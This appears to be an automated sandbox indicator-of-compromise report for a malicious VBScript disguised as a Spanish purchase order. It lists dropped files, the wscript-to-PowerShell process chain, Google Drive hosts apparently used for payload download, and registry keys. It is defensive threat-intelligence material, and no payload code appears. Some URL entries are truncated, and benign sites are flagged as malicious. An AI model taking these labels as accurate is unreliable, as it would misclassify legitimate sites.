IOC Report
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs

Files

File Path
Type
Category
Malicious
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik42faz4.rce.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Benzinforhandlers.xan
HTML document, ASCII text, with very long lines (1692), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
malicious
https://go.micro
unknown
malicious
https://github.com/Pester/Pester
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://drive.googPzm
unknown
https://drive.usercontent.googhko
unknown
https://contoso.com/
unknown
https://drive.usercontent.google.comD=620
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.googPb
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown

Domains

Name
IP
Malicious
drive.google.com
142.250.185.206
drive.usercontent.google.com
142.250.185.65

IPs

IP
Domain
Country
Malicious
142.250.185.206
drive.google.com
United States
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory

Memdumps
